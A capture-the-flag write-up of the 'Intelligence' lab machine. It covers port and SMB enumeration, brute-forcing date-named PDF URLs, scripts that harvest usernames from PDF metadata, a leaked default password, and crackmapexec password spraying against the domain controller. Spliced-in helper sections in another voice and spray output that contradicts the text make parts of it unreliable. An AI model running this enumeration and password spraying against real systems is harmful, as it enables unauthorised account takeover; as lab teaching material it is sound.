# Intelligence

## Nmap Scan

```
$ nmap -sC -sV -Pn -oN nmap 10.10.10.248
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-05-27 02:19 EDT
Nmap scan report for 10.10.10.248
Host is up (0.011s latency).
Not shown: 988 filtered tcp ports (no-response)
PORT     STATE SERVICE       VERSION
53/tcp   open  domain        Simple DNS Plus
80/tcp   open  http          Microsoft IIS httpd 10.0
|_http-title: Intelligence
| http-methods: 
|_  Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
88/tcp   open  kerberos-sec  Microsoft Windows Kerberos (server time: 2024-05-27 13:13:31Z)
135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: intelligence.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=dc.intelligence.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:dc.intelligence.htb
| Not valid before: 2024-05-27T12:24:52
|_Not valid after:  2025-05-27T12:24:52
|_ssl-date: 2024-05-27T13:14:50+00:00; +6h54m19s from scanner time.
445/tcp  open  microsoft-ds?
464/tcp  open  kpasswd5?
593/tcp  open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp  open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: intelligence.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2024-05-27T13:14:51+00:00; +6h54m19s from scanner time.
| ssl-cert: Subject: commonName=dc.intelligence.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:dc.intelligence.htb
| Not valid before: 2024-05-27T12:24:52
|_Not valid after:  2025-05-27T12:24:52
3268/tcp open  ldap          Microsoft Windows Active Directory LDAP (Domain: intelligence.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2024-05-27T13:14:50+00:00; +6h54m19s from scanner time.
| ssl-cert: Subject: commonName=dc.intelligence.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:dc.intelligence.htb
| Not valid before: 2024-05-27T12:24:52
|_Not valid after:  2025-05-27T12:24:52
3269/tcp open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: intelligence.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=dc.intelligence.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:dc.intelligence.htb
| Not valid before: 2024-05-27T12:24:52
|_Not valid after:  2025-05-27T12:24:52
|_ssl-date: 2024-05-27T13:14:51+00:00; +6h54m19s from scanner time.
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled and required
|_clock-skew: mean: 6h54m18s, deviation: 0s, median: 6h54m18s
| smb2-time: 
|   date: 2024-05-27T13:14:11
|_  start_date: N/A

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 91.52 seconds
```

```
$ sudo nmap -sU -Pn -oN udp-nmap 10.10.10.248
[sudo] password for kali: 
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-05-27 03:39 EDT
Nmap scan report for intelligence.htb (10.10.10.248)
Host is up (0.0066s latency).
Not shown: 997 open|filtered udp ports (no-response)
PORT    STATE SERVICE
53/udp  open  domain
88/udp  open  kerberos-sec
123/udp open  ntp
```

## Initial Access

### enum4linux

#### Anonymous

```
$ enum4linux -a 10.10.10.248
Starting enum4linux v0.9.1 ( http://labs.portcullis.co.uk/application/enum4linux/ ) on Mon May 27 02:27:40 2024

 =========================================( Target Information )=========================================

Target ........... 10.10.10.248
RID Range ........ 500-550,1000-1050
Username ......... ''
Password ......... ''
Known Usernames .. administrator, guest, krbtgt, domain admins, root, bin, none


 ============================( Enumerating Workgroup/Domain on 10.10.10.248 )============================


[E] Can't find workgroup/domain



 ================================( Nbtstat Information for 10.10.10.248 )================================

Looking up status of 10.10.10.248
No reply from 10.10.10.248

 ===================================( Session Check on 10.10.10.248 )===================================


[+] Server 10.10.10.248 allows sessions using username '', password ''


 ================================( Getting domain SID for 10.10.10.248 )================================

Domain Name: intelligence
Domain Sid: S-1-5-21-4210132550-3389855604-3437519686

[+] Host is part of a domain (not a workgroup)


 ===================================( OS information on 10.10.10.248 )===================================


[E] Can't get OS info with smbclient


[+] Got OS info for 10.10.10.248 from srvinfo:
do_cmd: Could not initialise srvsvc. Error was NT_STATUS_ACCESS_DENIED


 =======================================( Users on 10.10.10.248 )=======================================


[E] Couldn't find users using querydispinfo: NT_STATUS_ACCESS_DENIED



[E] Couldn't find users using enumdomusers: NT_STATUS_ACCESS_DENIED


 =================================( Share Enumeration on 10.10.10.248 )=================================

do_connect: Connection to 10.10.10.248 failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)

        Sharename       Type      Comment
        ---------       ----      -------
Reconnecting with SMB1 for workgroup listing.
Unable to connect with SMB1 -- no workgroup available

[+] Attempting to map shares on 10.10.10.248


 ============================( Password Policy Information for 10.10.10.248 )============================


[E] Unexpected error from polenum:



[+] Attaching to 10.10.10.248 using a NULL share

[+] Trying protocol 139/SMB...

        [!] Protocol failed: Cannot request session (Called Name:10.10.10.248)

[+] Trying protocol 445/SMB...

        [!] Protocol failed: SAMR SessionError: code: 0xc0000022 - STATUS_ACCESS_DENIED - {Access Denied} A process has requested access to an object but has not been granted those access rights.



[E] Failed to get password policy with rpcclient



 =======================================( Groups on 10.10.10.248 )=======================================


[+] Getting builtin groups:


[+]  Getting builtin group memberships:


[+]  Getting local groups:


[+]  Getting local group memberships:


[+]  Getting domain groups:


[+]  Getting domain group memberships:


 ==================( Users on 10.10.10.248 via RID cycling (RIDS: 500-550,1000-1050) )==================


[E] Couldn't get SID: NT_STATUS_ACCESS_DENIED.  RID cycling not possible.


 ===============================( Getting printer info for 10.10.10.248 )===============================

do_cmd: Could not initialise spoolss. Error was NT_STATUS_ACCESS_DENIED


enum4linux complete on Mon May 27 02:28:03 2024
```

#### Guest

```
$ enum4linux -a -u 'guest' -p '' 10.10.10.248
Starting enum4linux v0.9.1 ( http://labs.portcullis.co.uk/application/enum4linux/ ) on Mon May 27 02:28:24 2024

 =========================================( Target Information )=========================================

Target ........... 10.10.10.248
RID Range ........ 500-550,1000-1050
Username ......... 'guest'
Password ......... ''
Known Usernames .. administrator, guest, krbtgt, domain admins, root, bin, none


 ============================( Enumerating Workgroup/Domain on 10.10.10.248 )============================


[E] Can't find workgroup/domain



 ================================( Nbtstat Information for 10.10.10.248 )================================

Looking up status of 10.10.10.248
No reply from 10.10.10.248

 ===================================( Session Check on 10.10.10.248 )===================================


[E] Server doesn't allow session using username 'guest', password ''.  Aborting remainder of tests.
```

### Port 80

#### Directory Enumeration

```
$ gobuster dir -u http://10.10.10.248/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -o intelligence/gobuster -x txt,pdf,config -b 404 -k
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://10.10.10.248/
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.6
[+] Extensions:              txt,pdf,config
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/documents            (Status: 301) [Size: 153] [--> http://10.10.10.248/documents/]
/Documents            (Status: 301) [Size: 153] [--> http://10.10.10.248/Documents/]
Progress: 882240 / 882244 (100.00%)
===============================================================
Finished
===============================================================
```

```
$ gobuster dir -u http://10.10.10.248/documents/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -o intelligence/gobuster -x txt,pdf,config -b 404 -k
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://10.10.10.248/documents/
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.6
[+] Extensions:              txt,pdf,config
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
Progress: 882240 / 882244 (100.00%)
===============================================================
Finished
===============================================================
```

Looking at the naming convention of the documents, I can see that they use this format: `<YYYY>-<MM>-<DD>-upload.pdf`

<figure><img src="https://2790417739-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FIXulVMkW3AbpCXfmoP1H%2Fuploads%2FCe4UILkpCWxf1aRAaq9R%2Fimage.png?alt=media&#x26;token=d18f49c6-637e-4f6b-8b34-b9f94801473e" alt=""><figcaption></figcaption></figure>

<figure><img src="https://2790417739-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FIXulVMkW3AbpCXfmoP1H%2Fuploads%2FOvmP6zmTCpfU8UIwUG6m%2Fimage.png?alt=media&#x26;token=71201652-ddcc-41d8-b592-ff7aae5284cb" alt=""><figcaption></figcaption></figure>

{% embed url="<https://github.com/Septimus4/dateGenerator>" %}

So I used this Python script to generate the dates first:

```
$ python3 date_generator.py 2020 2021 0 "-" > wordlist.txt
```

Next, I appended `-upload.pdf` to each line to create the finalised wordlist.

```
$ while read -r line; do echo "${line}-upload.pdf"; done < wordlist.txt > finalised_wordlist.txt
```

So the final wordlist will look like this:

```
2020-01-01-upload.pdf
....
2020-12-31-upload.pdf
```
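The two-step pipeline above (generate dates, then append the suffix) can be done in one place; the script below is an added example, not the dateGenerator project linked above. It builds the `<YYYY>-<MM>-<DD>-upload.pdf` candidate list for a year range, skips dates that do not exist (so no `2020-02-30`), and reports the size of the resulting search space, which is the number a defender should notice: a predictable date-based naming scheme turns "unlisted" documents into a few hundred guesses. The function names `build_wordlist` and `search_space_size` are this example's own.

```python
"""Date-named file wordlist generator (added example, not the page's dateGenerator script).

Produces the <YYYY>-<MM>-<DD>-upload.pdf names the page brute-forced, one
entry per real calendar day, and quantifies how small that space is.
"""
from datetime import date, timedelta
from typing import Iterator, List


def iter_dates(start_year: int, end_year: int) -> Iterator[date]:
    """Yield every calendar day from 1 Jan start_year to 31 Dec end_year.

    Stepping with timedelta lets the datetime module handle leap years and
    month lengths, so invalid dates are never produced.
    """
    current = date(start_year, 1, 1)
    last = date(end_year, 12, 31)
    one_day = timedelta(days=1)
    while current <= last:
        yield current
        current += one_day


def build_wordlist(start_year: int, end_year: int,
                   suffix: str = "-upload.pdf", sep: str = "-") -> List[str]:
    """Return candidate file names in the page's <YYYY>-<MM>-<DD>-upload.pdf format.

    `sep` plays the role of the "-" separator argument passed to
    date_generator.py on the page; `suffix` is the string the shell loop
    appended afterwards.
    """
    names: List[str] = []
    for d in iter_dates(start_year, end_year):
        stamp = sep.join((f"{d.year:04d}", f"{d.month:02d}", f"{d.day:02d}"))
        names.append(f"{stamp}{suffix}")
    return names


def search_space_size(start_year: int, end_year: int) -> int:
    """Number of candidates an enumerator has to try: one per real day."""
    return len(build_wordlist(start_year, end_year))


if __name__ == "__main__":
    # Same range the page used: 2020 through 2021.
    words = build_wordlist(2020, 2021)
    print(f"{len(words)} candidates, first {words[0]}, last {words[-1]}")
    # Write the file that gobuster is pointed at with -w.
    with open("finalised_wordlist.txt", "w") as fh:
        fh.write("\n".join(words) + "\n")
```

For 2020 through 2021 the list has 731 entries (2020 is a leap year), which is why a single gobuster pass with no extension fuzzing finishes in seconds.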

When we run gobuster again with that wordlist, it gives this:

```
$ gobuster dir -u http://10.10.10.248/Documents/ -w finalised_wordlist.txt -b 404 -k
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://10.10.10.248/Documents/
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                finalised_wordlist.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.6
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/2020-01-02-upload.pdf (Status: 200) [Size: 27002]
/2020-01-10-upload.pdf (Status: 200) [Size: 26400]
/2020-01-01-upload.pdf (Status: 200) [Size: 26835]
/2020-01-04-upload.pdf (Status: 200) [Size: 27522]
/2020-01-20-upload.pdf (Status: 200) [Size: 11632]
/2020-01-22-upload.pdf (Status: 200) [Size: 28637]
/2020-01-23-upload.pdf (Status: 200) [Size: 11557]
/2020-01-30-upload.pdf (Status: 200) [Size: 26706]
/2020-01-25-upload.pdf (Status: 200) [Size: 26252]
/2020-02-11-upload.pdf (Status: 200) [Size: 25245]
/2020-02-17-upload.pdf (Status: 200) [Size: 11228]
/2020-02-23-upload.pdf (Status: 200) [Size: 27378]
/2020-02-28-upload.pdf (Status: 200) [Size: 11543]
/2020-02-24-upload.pdf (Status: 200) [Size: 27332]
/2020-03-04-upload.pdf (Status: 200) [Size: 26194]
/2020-03-05-upload.pdf (Status: 200) [Size: 26124]
/2020-03-12-upload.pdf (Status: 200) [Size: 27143]
/2020-03-13-upload.pdf (Status: 200) [Size: 24888]
/2020-03-21-upload.pdf (Status: 200) [Size: 11250]
/2020-03-17-upload.pdf (Status: 200) [Size: 27227]
/2020-04-02-upload.pdf (Status: 200) [Size: 11466]
/2020-04-04-upload.pdf (Status: 200) [Size: 27949]
/2020-04-15-upload.pdf (Status: 200) [Size: 26689]
/2020-04-23-upload.pdf (Status: 200) [Size: 24865]
/2020-05-01-upload.pdf (Status: 200) [Size: 28228]
/2020-05-07-upload.pdf (Status: 200) [Size: 26062]
/2020-05-11-upload.pdf (Status: 200) [Size: 27244]
/2020-05-03-upload.pdf (Status: 200) [Size: 26093]
/2020-05-17-upload.pdf (Status: 200) [Size: 26448]
/2020-05-21-upload.pdf (Status: 200) [Size: 26255]
/2020-05-24-upload.pdf (Status: 200) [Size: 11857]
/2020-05-20-upload.pdf (Status: 200) [Size: 27480]
/2020-05-29-upload.pdf (Status: 200) [Size: 11532]
/2020-06-03-upload.pdf (Status: 200) [Size: 11381]
/2020-06-02-upload.pdf (Status: 200) [Size: 27797]
/2020-06-04-upload.pdf (Status: 200) [Size: 26922]
/2020-06-07-upload.pdf (Status: 200) [Size: 27937]
/2020-06-08-upload.pdf (Status: 200) [Size: 11540]
/2020-06-12-upload.pdf (Status: 200) [Size: 11575]
/2020-06-14-upload.pdf (Status: 200) [Size: 26443]
/2020-06-15-upload.pdf (Status: 200) [Size: 27121]
/2020-06-21-upload.pdf (Status: 200) [Size: 26060]
/2020-06-22-upload.pdf (Status: 200) [Size: 26278]
/2020-06-25-upload.pdf (Status: 200) [Size: 10662]
/2020-06-26-upload.pdf (Status: 200) [Size: 27338]
/2020-06-28-upload.pdf (Status: 200) [Size: 26390]
/2020-06-30-upload.pdf (Status: 200) [Size: 25634]
/2020-07-02-upload.pdf (Status: 200) [Size: 27320]
/2020-07-06-upload.pdf (Status: 200) [Size: 24966]
/2020-07-08-upload.pdf (Status: 200) [Size: 11910]
/2020-07-20-upload.pdf (Status: 200) [Size: 12100]
/2020-07-24-upload.pdf (Status: 200) [Size: 26321]
/2020-08-01-upload.pdf (Status: 200) [Size: 27038]
/2020-08-03-upload.pdf (Status: 200) [Size: 25405]
/2020-08-09-upload.pdf (Status: 200) [Size: 11611]
/2020-08-20-upload.pdf (Status: 200) [Size: 10711]
/2020-08-19-upload.pdf (Status: 200) [Size: 26885]
/2020-09-04-upload.pdf (Status: 200) [Size: 26986]
/2020-09-05-upload.pdf (Status: 200) [Size: 26417]
/2020-09-06-upload.pdf (Status: 200) [Size: 25551]
/2020-09-02-upload.pdf (Status: 200) [Size: 27148]
/2020-09-11-upload.pdf (Status: 200) [Size: 12098]
/2020-09-13-upload.pdf (Status: 200) [Size: 26521]
/2020-09-16-upload.pdf (Status: 200) [Size: 26959]
/2020-09-22-upload.pdf (Status: 200) [Size: 25072]
/2020-09-27-upload.pdf (Status: 200) [Size: 26809]
/2020-09-30-upload.pdf (Status: 200) [Size: 26080]
/2020-09-29-upload.pdf (Status: 200) [Size: 24586]
/2020-10-05-upload.pdf (Status: 200) [Size: 11248]
/2020-10-19-upload.pdf (Status: 200) [Size: 27196]
/2020-11-01-upload.pdf (Status: 200) [Size: 26599]
/2020-11-03-upload.pdf (Status: 200) [Size: 25568]
/2020-11-06-upload.pdf (Status: 200) [Size: 25964]
/2020-11-11-upload.pdf (Status: 200) [Size: 26461]
/2020-11-13-upload.pdf (Status: 200) [Size: 11074]
/2020-11-10-upload.pdf (Status: 200) [Size: 25472]
/2020-11-24-upload.pdf (Status: 200) [Size: 11412]
/2020-11-30-upload.pdf (Status: 200) [Size: 27286]
/2020-12-10-upload.pdf (Status: 200) [Size: 26762]
/2020-12-15-upload.pdf (Status: 200) [Size: 27242]
/2020-12-20-upload.pdf (Status: 200) [Size: 11902]
/2020-12-24-upload.pdf (Status: 200) [Size: 26825]
/2020-12-28-upload.pdf (Status: 200) [Size: 11480]
Progress: 366 / 367 (99.73%)
/2020-12-30-upload.pdf (Status: 200) [Size: 25109]
===============================================================
Finished
===============================================================
```

So I copied the hits (the lines carrying the file paths) into a file named `curlrequest`:

```
/2020-01-02-upload.pdf (Status: 200) [Size: 27002]
/2020-01-10-upload.pdf (Status: 200) [Size: 26400]
/2020-01-01-upload.pdf (Status: 200) [Size: 26835]
/2020-01-04-upload.pdf (Status: 200) [Size: 27522]
/2020-01-20-upload.pdf (Status: 200) [Size: 11632]
/2020-01-22-upload.pdf (Status: 200) [Size: 28637]
/2020-01-23-upload.pdf (Status: 200) [Size: 11557]
/2020-01-30-upload.pdf (Status: 200) [Size: 26706]
/2020-01-25-upload.pdf (Status: 200) [Size: 26252]
/2020-02-11-upload.pdf (Status: 200) [Size: 25245]
/2020-02-17-upload.pdf (Status: 200) [Size: 11228]
...
/2020-12-20-upload.pdf (Status: 200) [Size: 11902]
/2020-12-24-upload.pdf (Status: 200) [Size: 26825]
/2020-12-28-upload.pdf (Status: 200) [Size: 11480]
/2020-12-30-upload.pdf (Status: 200) [Size: 25109]
```

I used this Python script to generate a bash script that downloads all the files from the server.

```python
# Turn the saved gobuster hits (file "curlrequest") into a bash script that
# fetches every PDF with curl.
with open('curlrequest', 'r') as file1, open('curlrequest.sh', 'w') as file2:
    for line in file1:
        if not line.strip():
            continue
        # Keep only the path, e.g. "/2020-01-02-upload.pdf", dropping the
        # " (Status: 200) [Size: 27002]" suffix
        path = line.split()[0]
        file2.write("curl -O http://10.10.10.248/documents" + path + "\n")
```

After running the generated script and reading through the PDFs, two documents stand out:

- 2020-12-30 - IT Internal Update
- 2020-06-04 - New Account Guide

<figure><img src="https://2790417739-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FIXulVMkW3AbpCXfmoP1H%2Fuploads%2FCMQ2Aw2wubnKs6qfJWCZ%2Fimage.png?alt=media&#x26;token=4e494327-3c11-48c2-9b94-988744e15717" alt=""><figcaption></figcaption></figure>

<figure><img src="https://2790417739-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FIXulVMkW3AbpCXfmoP1H%2Fuploads%2FiHoK0XLPbPtCjJsXTMOA%2Fimage.png?alt=media&#x26;token=01157165-61ff-4714-92f8-7d2f94578bcc" alt=""><figcaption></figcaption></figure>

So the default password for new accounts is `NewIntelligenceCorpUser9876`. However, we do not know which usernames still use it, so the next step is to see whether the PDF metadata reveals anything.

Using `exiftool`, I can see who the `Creator` of each document is.

<figure><img src="https://2790417739-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FIXulVMkW3AbpCXfmoP1H%2Fuploads%2FHQqhh2qqFsQpxAR0o3Qt%2Fimage.png?alt=media&#x26;token=0ec4dcbc-20d9-4e91-9ae1-e6b33ac5a2c5" alt=""><figcaption></figcaption></figure>

I can write another Python script to generate a bash script that prints the `Creator` field of every PDF.

```python
# Turn the same gobuster hits into a bash script that prints the Creator
# metadata field of every downloaded PDF.
with open('curlrequest', 'r') as file1, open('getusernames.sh', 'w') as file2:
    for line in file1:
        if not line.strip():
            continue
        # "/2020-01-02-upload.pdf" -> "2020-01-02-upload.pdf" (the local filename)
        name = line.split()[0].lstrip('/')
        # exiftool pads the tag name to 32 columns, so the value starts at column 35
        file2.write("exiftool " + name + " | grep Creator | cut -c 35-\n")
```

After generating the bash script and running it, I get the `Creator` of every document. However, the list contains duplicates, because several documents share a creator.

So I ran it like this, sorting and deduplicating the names and writing them to a file (`uniq` only collapses adjacent duplicates, so the input has to be sorted first):

```bash
./getusernames.sh | sort -u > usernames.txt
```
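The two generator scripts and the dedupe step above, as one added Python helper (not from the original post; names such as `parse_gobuster` are my own): it parses gobuster hits without a fixed-width slice, reads the `Creator` tag by name rather than by column, and shows why `uniq -u` is the wrong tool for deduplicating the names. The sample inputs are constructed in the formats shown on this page.

```python
import re
from typing import Iterable, List, Optional

# One gobuster result line, e.g. "/2020-01-02-upload.pdf (Status: 200) [Size: 27002]"
GOBUSTER_LINE = re.compile(
    r"^(?P<path>/\S+)\s+\(Status:\s*(?P<status>\d+)\)\s+\[Size:\s*(?P<size>\d+)\]"
)
# exiftool prints "Creator                         : Jose.Williams"; anchoring on the
# tag name avoids the fixed "cut -c 35-" offset, which breaks if the padding changes.
CREATOR_LINE = re.compile(r"^Creator\s*:\s*(?P<creator>\S.*?)\s*$", re.MULTILINE)

# Constructed samples in the formats shown above (not real tool output).
SAMPLE_GOBUSTER = """\
/2020-01-02-upload.pdf (Status: 200) [Size: 27002]
/2020-01-10-upload.pdf (Status: 200) [Size: 26400]
Progress: 366 / 367 (99.73%)
/2020-12-30-upload.pdf (Status: 200) [Size: 25109]
"""
SAMPLE_EXIF = """\
ExifTool Version Number         : 12.00
File Name                       : 2020-01-02-upload.pdf
Creator                         : William.Lee
Producer                        : (constructed sample)
"""


def parse_gobuster(output: str, status: str = "200") -> List[str]:
    """Return the paths of all hits with the given status, in the order found."""
    paths = []
    for line in output.splitlines():
        m = GOBUSTER_LINE.match(line.strip())
        if m and m.group("status") == status:
            paths.append(m.group("path"))
    return paths


def download_commands(paths: Iterable[str],
                      base_url: str = "http://10.10.10.248/Documents") -> List[str]:
    """One curl command per path, which is what curlrequest.sh consisted of."""
    return [f"curl -O {base_url}{p}" for p in paths]


def creator_from_exiftool(exif_output: str) -> Optional[str]:
    """Extract the Creator tag from `exiftool <file>` output, or None if absent."""
    m = CREATOR_LINE.search(exif_output)
    return m.group("creator") if m else None


def unique_names(names: Iterable[str]) -> List[str]:
    """Order-preserving deduplication: the same set `sort -u` produces."""
    seen, out = set(), []
    for n in names:
        if n not in seen:
            seen.add(n)
            out.append(n)
    return out


def uniq_u(lines: Iterable[str]) -> List[str]:
    """Emulate GNU `uniq -u`: print only lines that are NOT repeated adjacently.
    On unsorted input non-adjacent duplicates survive; on sorted input every name
    that occurs more than once disappears entirely. Either way it is the wrong
    tool for building a username list."""
    lines, out, i = list(lines), [], 0
    while i < len(lines):
        j = i
        while j < len(lines) and lines[j] == lines[i]:
            j += 1
        if j - i == 1:
            out.append(lines[i])
        i = j
    return out


if __name__ == "__main__":
    for cmd in download_commands(parse_gobuster(SAMPLE_GOBUSTER)):
        print(cmd)
    print("creator:", creator_from_exiftool(SAMPLE_EXIF))
    names = ["Jose.Williams", "Jose.Williams", "William.Lee", "Jose.Williams"]
    print("sort -u ->", sorted(unique_names(names)))
    print("uniq -u ->", uniq_u(names))
```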

Running `crackmapexec` with the username list against the default password shows that one user never changed it: `Tiffany.Molina`.

```
$ sudo crackmapexec smb 10.10.10.248 -u usernames.txt -p 'NewIntelligenceCorpUser9876'
SMB         10.10.10.248    445    DC               [*] Windows 10.0 Build 17763 x64 (name:DC) (domain:intelligence.htb) (signing:True) (SMBv1:False)
SMB         10.10.10.248    445    DC               [-] intelligence.htb\Scott.Scott:NewIntelligenceCorpUser9876 STATUS_LOGON_FAILURE 
SMB         10.10.10.248    445    DC               [-] intelligence.htb\Veronica.Patel:NewIntelligenceCorpUser9876 STATUS_LOGON_FAILURE 
SMB         10.10.10.248    445    DC               [-] intelligence.htb\William.Lee:NewIntelligenceCorpUser9876 STATUS_LOGON_FAILURE 
SMB         10.10.10.248    445    DC               [-] intelligence.htb\Jason.Wright:NewIntelligenceCorpUser9876 STATUS_LOGON_FAILURE 
SMB         10.10.10.248    445    DC               [-] intelligence.htb\Jennifer.Thomas:NewIntelligenceCorpUser9876 STATUS_LOGON_FAILURE 
SMB         10.10.10.248    445    DC               [-] intelligence.htb\Danny.Matthews:NewIntelligenceCorpUser9876 STATUS_LOGON_FAILURE 
SMB         10.10.10.248    445    DC               [-] intelligence.htb\David.Reed:NewIntelligenceCorpUser9876 STATUS_LOGON_FAILURE 
SMB         10.10.10.248    445    DC               [-] intelligence.htb\Daniel.Shelton:NewIntelligenceCorpUser9876 STATUS_LOGON_FAILURE 
SMB         10.10.10.248    445    DC               [-] intelligence.htb\Stephanie.Young:NewIntelligenceCorpUser9876 STATUS_LOGON_FAILURE 
SMB         10.10.10.248    445    DC               [-] intelligence.htb\Jose.Williams:NewIntelligenceCorpUser9876 STATUS_LOGON_FAILURE 
SMB         10.10.10.248    445    DC               [-] intelligence.htb\John.Coleman:NewIntelligenceCorpUser9876 STATUS_LOGON_FAILURE 
SMB         10.10.10.248    445    DC               [-] intelligence.htb\Jason.Wright:NewIntelligenceCorpUser9876 STATUS_LOGON_FAILURE 
SMB         10.10.10.248    445    DC               [-] intelligence.htb\Daniel.Shelton:NewIntelligenceCorpUser9876 STATUS_LOGON_FAILURE 
SMB         10.10.10.248    445    DC               [-] intelligence.htb\Jose.Williams:NewIntelligenceCorpUser9876 STATUS_LOGON_FAILURE 
SMB         10.10.10.248    445    DC               [-] intelligence.htb\Brian.Morris:NewIntelligenceCorpUser9876 STATUS_LOGON_FAILURE 
SMB         10.10.10.248    445    DC               [-] intelligence.htb\Jennifer.Thomas:NewIntelligenceCorpUser9876 STATUS_LOGON_FAILURE 
SMB         10.10.10.248    445    DC               [-] intelligence.htb\Thomas.Valenzuela:NewIntelligenceCorpUser9876 STATUS_LOGON_FAILURE 
SMB         10.10.10.248    445    DC               [-] intelligence.htb\Travis.Evans:NewIntelligenceCorpUser9876 STATUS_LOGON_FAILURE 
SMB         10.10.10.248    445    DC               [-] intelligence.htb\Richard.Williams:NewIntelligenceCorpUser9876 STATUS_LOGON_FAILURE 
SMB         10.10.10.248    445    DC               [-] intelligence.htb\Samuel.Richardson:NewIntelligenceCorpUser9876 STATUS_LOGON_FAILURE 
SMB         10.10.10.248    445    DC               [-] intelligence.htb\David.Mcbride:NewIntelligenceCorpUser9876 STATUS_LOGON_FAILURE 
SMB         10.10.10.248    445    DC               [-] intelligence.htb\Jose.Williams:NewIntelligenceCorpUser9876 STATUS_LOGON_FAILURE 
SMB         10.10.10.248    445    DC               [-] intelligence.htb\John.Coleman:NewIntelligenceCorpUser9876 STATUS_LOGON_FAILURE 
SMB         10.10.10.248    445    DC               [-] intelligence.htb\William.Lee:NewIntelligenceCorpUser9876 STATUS_LOGON_FAILURE 
SMB         10.10.10.248    445    DC               [-] intelligence.htb\Anita.Roberts:NewIntelligenceCorpUser9876 STATUS_LOGON_FAILURE 
SMB         10.10.10.248    445    DC               [-] intelligence.htb\Jose.Williams:NewIntelligenceCorpUser9876 STATUS_LOGON_FAILURE 
SMB         10.10.10.248    445    DC               [-] intelligence.htb\David.Mcbride:NewIntelligenceCorpUser9876 STATUS_LOGON_FAILURE 
SMB         10.10.10.248    445    DC               [-] intelligence.htb\Brian.Baker:NewIntelligenceCorpUser9876 STATUS_LOGON_FAILURE 
SMB         10.10.10.248    445    DC               [-] intelligence.htb\Kelly.Long:NewIntelligenceCorpUser9876 STATUS_LOGON_FAILURE 
SMB         10.10.10.248    445    DC               [-] intelligence.htb\Jose.Williams:NewIntelligenceCorpUser9876 STATUS_LOGON_FAILURE 
SMB         10.10.10.248    445    DC               [-] intelligence.htb\Nicole.Brock:NewIntelligenceCorpUser9876 STATUS_LOGON_FAILURE 
SMB         10.10.10.248    445    DC               [-] intelligence.htb\John.Coleman:NewIntelligenceCorpUser9876 STATUS_LOGON_FAILURE 
SMB         10.10.10.248    445    DC               [-] intelligence.htb\Thomas.Valenzuela:NewIntelligenceCorpUser9876 STATUS_LOGON_FAILURE 
SMB         10.10.10.248    445    DC               [-] intelligence.htb\Kaitlyn.Zimmerman:NewIntelligenceCorpUser9876 STATUS_LOGON_FAILURE 
SMB         10.10.10.248    445    DC               [-] intelligence.htb\David.Reed:NewIntelligenceCorpUser9876 STATUS_LOGON_FAILURE 
SMB         10.10.10.248    445    DC               [-] intelligence.htb\Jason.Patterson:NewIntelligenceCorpUser9876 STATUS_LOGON_FAILURE 
SMB         10.10.10.248    445    DC               [-] intelligence.htb\Thomas.Valenzuela:NewIntelligenceCorpUser9876 STATUS_LOGON_FAILURE 
SMB         10.10.10.248    445    DC               [-] intelligence.htb\David.Mcbride:NewIntelligenceCorpUser9876 STATUS_LOGON_FAILURE 
SMB         10.10.10.248    445    DC               [-] intelligence.htb\Darryl.Harris:NewIntelligenceCorpUser9876 STATUS_LOGON_FAILURE 
SMB         10.10.10.248    445    DC               [-] intelligence.htb\William.Lee:NewIntelligenceCorpUser9876 STATUS_LOGON_FAILURE 
SMB         10.10.10.248    445    DC               [-] intelligence.htb\Stephanie.Young:NewIntelligenceCorpUser9876 STATUS_LOGON_FAILURE 
SMB         10.10.10.248    445    DC               [-] intelligence.htb\David.Reed:NewIntelligenceCorpUser9876 STATUS_LOGON_FAILURE 
